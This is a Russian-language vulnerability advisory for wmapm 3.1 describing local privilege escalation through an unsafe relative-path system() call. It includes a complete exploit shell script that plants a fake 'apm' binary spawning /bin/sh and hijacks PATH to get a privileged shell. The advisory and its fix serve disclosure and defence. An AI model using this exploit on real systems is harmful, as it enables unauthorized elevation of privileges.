| Дата публикации: | 12.11.2003 |
| Всего просмотров: | 1369 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная |
| Воздействие: | Повышение привилегий |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | wmapm 3.x |
| Уязвимые версии: wmapm 3.1
Описание: Уязвимость обнаружена в wmapm. Злонамеренный пользователь может получить поднятые привилегии на уязвимой системе. Уязвимость связанна с небезопасным использованием вызова "system()" к "apm" файлу, без обеспечения абсолютного пути. В результате удаленный пользователь может выполнить произвольную программу с именем "apm" в произвольном местоположении, манипулируя значением переменной окружения "PATH" с root привилегиями. Пример/Эксплоит: #/bin/sh # Pretty useless, we can mess up /etc/dumpdates or run shutdown # on FreeBSD systems with wmapm from ports. # If wmapm is installed from source we get root instead, # so I suppose this might be worth something(uid 0) on linux. # kokanin@dtors~ pkg_info | grep -i wmapm # wmapm-3.1 Laptop battery status display for WindowMaker # kokanin@dtors~ ls -la `which wmapm` # -rwxr-sr-x 1 root operator 41892 Mar 23 10:00 /usr/X11R6/bin/wmapm # kokanin@dtors~ sh DSR-wmapm.sh # press the S button when wmapm starts # $ /usr/bin/id # uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers) echo "/bin/sh" > apm chmod +x ./apm echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts" export PATH=.:$PATH /usr/X11R6/bin/wmapm rm ./apm URL производителя:http://nis-www.lanl.gov/~mgh/WindowMaker/DockApps.shtml Решение:Удалите suid или sgid бит |